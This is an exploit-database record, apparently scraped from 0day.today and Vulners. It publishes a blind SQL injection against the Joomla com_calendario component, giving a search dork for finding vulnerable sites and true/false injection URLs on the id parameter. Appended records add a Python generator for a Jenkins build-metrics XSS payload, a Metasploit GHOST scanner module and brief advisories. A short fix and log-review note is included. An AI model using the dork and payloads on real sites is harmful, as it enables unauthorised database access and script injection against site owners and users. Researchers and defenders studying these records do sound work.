ID 1337DAY-ID-10475
Type zdt
Reporter Mr.tro0oqy
Modified 2009-12-28T00:00:00
Description
Exploit for unknown platform in category web applications
=================================================================
Joomla Component com_calendario Blind SQL injection Vulnerability
=================================================================
dork: inurl:index.php?option=com_calendario
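exp (the injection point is the id parameter of task=detalhes; the two requests differ only in the appended boolean condition, and the injection is blind, i.e. it shows only as a difference between the two responses, not as query output):
http://www.target.com/index.php?option=com_calendario&task=detalhes&Itemid=88&id=297+and+1=1 true
http://www.target.com/index.php?option=com_calendario&task=detalhes&Itemid=88&id=297+and+1=0 false
fix: this advisory names no patched version; the component has to cast id to an integer or bind it as a query parameter before it reaches the database. In access logs, requests to option=com_calendario whose id value is not purely numeric are the ones to review.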
enjoy ;)
# 0day.today [2018-04-13] #
{"published": "2009-12-28T00:00:00", "id": "1337DAY-ID-10475", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-19T04:09:25", "bulletin": {"published": "2009-12-28T00:00:00", "id": "1337DAY-ID-10475", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 6.8, "modified": "2016-04-19T04:09:25", "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:C/"}}, "hash": "49f143972c0bf66d353a9379fe5bf6aac1c174e0a1ba0267163127f0e2c2bbdd", "description": "Exploit for unknown platform in category web applications", "type": "zdt", "lastseen": "2016-04-19T04:09:25", "edition": 1, "title": "Joomla Component com_calendario Blind SQL injection Vulnerability", "href": "http://0day.today/exploit/description/10475", "modified": "2009-12-28T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/10475", "references": [], "reporter": "Mr.tro0oqy", "sourceData": "=================================================================\r\nJoomla Component com_calendario Blind SQL injection Vulnerability\r\n=================================================================\r\n\r\ndork: inurl:index.php?option=com_calendario\r\n \r\n \r\nexp :\r\n \r\nhttp://www.target.com/index.php?option=com_calendario&task=detalhes&Itemid=88&id=297+and+1=1 true\r\n \r\n \r\nhttp://www.target.com/index.php?option=com_calendario&task=detalhes&Itemid=88&id=297+and+1=0 false\r\n \r\n \r\nenjoy ;)\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "a07def2dc7c1facbdc241666f1853a32", "key": "href"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "795b612fe6caf7ee070c9a65b9733127", "key": "sourceData"}, {"hash": "d4dab4960ea754b67491f1ead219c866", "key": "published"}, {"hash": 
"d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "743c843fae9a6b43e91cd20838bcc1ce", "key": "title"}, {"hash": "b830a4e55627eea4a40db0974801f8e7", "key": "sourceHref"}, {"hash": "162fc043ec12cc84096f739c8d5b806c", "key": "reporter"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "d4dab4960ea754b67491f1ead219c866", "key": "modified"}], "objectVersion": "1.0"}}], "description": "Exploit for unknown platform in category web applications", "hash": "d01083a754211eb76909852ed4695a790cecc39315285383af6165e2d087124f", "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2018-04-13T01:47:14"}, "dependencies": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:10475", "SECURITYVULNS:VULN:5496"]}, {"type": "joomla", "idList": ["JOOMLA-297"]}], "modified": "2018-04-13T01:47:14"}, "vulnersScore": 0.2}, "type": "zdt", "lastseen": "2018-04-13T01:47:14", "edition": 2, "title": "Joomla Component com_calendario Blind SQL injection Vulnerability", "href": "https://0day.today/exploit/description/10475", "modified": "2009-12-28T00:00:00", "bulletinFamily": "exploit", "viewCount": 4, "cvelist": [], "sourceHref": "https://0day.today/exploit/10475", "references": [], "reporter": "Mr.tro0oqy", "sourceData": "=================================================================\r\nJoomla Component com_calendario Blind SQL injection Vulnerability\r\n=================================================================\r\n\r\ndork: inurl:index.php?option=com_calendario\r\n \r\n \r\nexp :\r\n \r\nhttp://www.target.com/index.php?option=com_calendario&task=detalhes&Itemid=88&id=297+and+1=1 true\r\n \r\n \r\nhttp://www.target.com/index.php?option=com_calendario&task=detalhes&Itemid=88&id=297+and+1=0 false\r\n \r\n \r\nenjoy ;)\r\n\r\n\r\n\n# 0day.today [2018-04-13] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": 
"d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "ebe37ded7e29bf1602949162b6245d8f", "key": "href"}, {"hash": "d4dab4960ea754b67491f1ead219c866", "key": "modified"}, {"hash": "d4dab4960ea754b67491f1ead219c866", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "162fc043ec12cc84096f739c8d5b806c", "key": "reporter"}, {"hash": "ceb3da58fdf0b848784c133dd008f46d", "key": "sourceData"}, {"hash": "82abbafc2b0108bbe9d710dd1a57a9bd", "key": "sourceHref"}, {"hash": "743c843fae9a6b43e91cd20838bcc1ce", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"zdt": [{"lastseen": "2019-12-04T12:01:20", "bulletinFamily": "exploit", "description": "Exploit for java platform in category web applications", "modified": "2019-11-08T00:00:00", "published": "2019-11-08T00:00:00", "id": "1337DAY-ID-33470", "href": "https://0day.today/exploit/description/33470", "title": "Jenkins build-metrics plugin 1.3 - (label) Cross-Site Scripting Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: Jenkins build-metrics plugin 1.3 - 'label' Cross-Site Scripting\r\n# Exploit Author: vesche (Austin Jackson)\r\n# Vendor Homepage: https://plugins.jenkins.io/build-metrics\r\n# Version: Jenkins build-metrics plugin 1.3 and below\r\n# Tested on: Debian 10 (Buster), Jenkins 2.203 (latest 2019-11-05), and build-metrics 1.3\r\n# CVE: CVE-2019-10475\r\n# Write-up: https://github.com/vesche/CVE-2019-10475\r\n\r\n#!/usr/bin/env python\r\n\r\nimport sys\r\nimport argparse\r\n\r\nVULN_URL = '''{base_url}/plugin/build-metrics/getBuildStats?label={inject}&range=2&rangeUnits=Weeks&jobFilteringType=ALL&jobFilter=&nodeFilteringType=ALL&nodeFilter=&launcherFilteringType=ALL&launcherFilter=&causeFilteringType=ALL&causeFilter=&Jenkins-Crumb=4412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96&json=%7B%22label%22%3A+%22Search+Results%22%2C+%22range%22%3A+%222%22%2C+%22rangeUnits%22%3A+%22Weeks%22%2C+%22jobFilteringType%22%3A+%22ALL%22%2C+%22jobNameRegex%22%3A+%22%22%2C+%22jobFilter%22%3A+%22%22%2C+%22nodeFilteringType%22%3A+%22ALL%22%2C+%22nodeNameRegex%22%3A+%22%22%2C+%22nodeFilter%22%3A+%22%22%2C+%22launcherFilteringType%22%3A+%22ALL%22%2C+%22launcherNameRegex%22%3A+%22%22%2C+%22launcherFilter%22%3A+%22%22%2C+%22causeFilteringType%22%3A+%22ALL%22%2C+%22causeNameRegex%22%3A+%22%22%2C+%22causeFilter%22%3A+%22%22%2C+%22Jenkins-Crumb%22%3A+%224412200a345e2a8cad31f07e8a09e18be6b7ee12b1b6b917bc01a334e0f20a96%22%7D&Submit=Search'''\r\n\r\n\r\ndef get_parser():\r\n parser = argparse.ArgumentParser(description='CVE-2019-10475')\r\n 
parser.add_argument('-p', '--port', help='port', default=80, type=int)\r\n parser.add_argument('-d', '--domain', help='domain', default='localhost', type=str)\r\n parser.add_argument('-i', '--inject', help='inject', default='<script>alert(\"CVE-2019-10475\")</script>', type=str)\r\n return parser\r\n\r\n\r\ndef main():\r\n parser = get_parser()\r\n args = vars(parser.parse_args())\r\n port = args['port']\r\n domain = args['domain']\r\n inject = args['inject']\r\n if port == 80:\r\n base_url = f'http://{domain}'\r\n elif port == 443:\r\n base_url = f'https://{domain}'\r\n else:\r\n base_url = f'http://{domain}:{port}'\r\n build_url = VULN_URL.format(base_url=base_url, inject=inject)\r\n print(build_url)\r\n return 0\r\n\r\n\r\nif __name__ == '__main__':\r\n sys.exit(main())\n\n# 0day.today [2019-12-04] #", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "sourceHref": "https://0day.today/exploit/33470"}], "metasploit": [{"lastseen": "2019-12-12T14:33:09", "bulletinFamily": "exploit", "description": "This module can be used to determine hosts vulnerable to the GHOST vulnerability via a call to the WordPress XMLRPC interface. If the target is vulnerable, the system will segfault and return a server error. 
On patched systems, a normal XMLRPC error is returned.\n", "modified": "2017-07-24T13:26:21", "published": "2015-01-30T14:29:51", "id": "MSF:AUXILIARY/SCANNER/HTTP/WORDPRESS_GHOST_SCANNER", "href": "", "type": "metasploit", "title": "WordPress XMLRPC GHOST Vulnerability Scanner", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HTTP::Wordpress\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'WordPress XMLRPC GHOST Vulnerability Scanner',\n 'Description' => %q{\n This module can be used to determine hosts vulnerable to the GHOST vulnerability via\n a call to the WordPress XMLRPC interface. If the target is vulnerable, the system\n will segfault and return a server error. On patched systems, a normal XMLRPC error\n is returned.\n },\n 'Author' =>\n [\n 'Robert Rowley',\n 'Christophe De La Fuente' ,\n 'Chaim Sanders' ,\n 'Felipe Costa' ,\n 'Jonathan Claudius' ,\n 'Karl Sigler' ,\n 'Christian Mehlmauer' # metasploit module\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2015-0235' ],\n [ 'URL', 'http://blog.spiderlabs.com/2015/01/ghost-gethostbyname-heap-overflow-in-glibc-cve-2015-0235.html'],\n [ 'URL', 'http://blog.sucuri.net/2015/01/critical-ghost-vulnerability-released.html']\n ]\n ))\n\n register_options(\n [\n OptInt.new('LENGTH', [false, 'Payload length', 2500]),\n ])\n end\n\n def length\n datastore['LENGTH']\n end\n\n def run_host(ip)\n unless wordpress_and_online?\n print_error(\"Looks like this site is no WordPress blog\")\n return\n end\n\n unless wordpress_xmlrpc_enabled?\n print_error(\"XMLRPC interface is not enabled\")\n return\n end\n\n ghost = \"0\" * length\n payload = \"http://#{ghost}/#{Rex::Text.rand_text_alpha(7)}.php\"\n xml = wordpress_generate_xml_rpc_body('pingback.ping', payload, 
payload)\n\n res = send_request_cgi(\n 'uri' => wordpress_url_xmlrpc,\n 'method' => 'POST',\n 'ctype' => 'text/xml;charset=UTF-8',\n 'data' => xml\n )\n\n if res.nil? || res.code == 500\n print_good(\"vulnerable to GHOST\")\n report_vuln(\n :host => ip,\n :proto => 'tcp',\n :port => datastore['RPORT'],\n :name => self.name,\n :info => \"Module #{self.fullname} found GHOST vulnerability\",\n :sname => datastore['SSL'] ? \"https\" : \"http\"\n )\n else\n print_status(\"target not vulnerable to GHOST\")\n end\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:35", "bulletinFamily": "software", "description": "BASES directory contains executable files and has weak security permissions.", "modified": "2009-12-16T00:00:00", "published": "2009-12-16T00:00:00", "id": "SECURITYVULNS:VULN:10475", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10475", "title": "Kaspersky Lab Multiple products privilege escalation", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:20", "bulletinFamily": "software", "description": "NAt feature DoS, sys_get_thread_area() kernel memory content leak, ip_vs_conn_flush() race conditions, Posix timers DoS, rose_rt_ioctl() DoS.", "modified": "2005-12-01T00:00:00", "published": "2005-12-01T00:00:00", "id": "SECURITYVULNS:VULN:5496", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:5496", "title": "Multiple linux kernels vulnerabilities", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}], "joomla": [{"lastseen": "2019-04-13T18:54:33", "bulletinFamily": "software", "description": "Some values were output from the database without being properly escaped. 
Most strings in question were sourced from the administrator panel.\n", "modified": "2009-06-02T00:00:00", "published": "2009-06-02T00:00:00", "href": "https://developer.joomla.org/security-centre/297-20090602-core-frontend-xss.html?highlight=WyJleHBsb2l0Il0=", "id": "JOOMLA-297", "type": "joomla", "title": "[20090603] - Core - Frontend XSS", "cvss": {"score": 0.0, "vector": "NONE"}}]}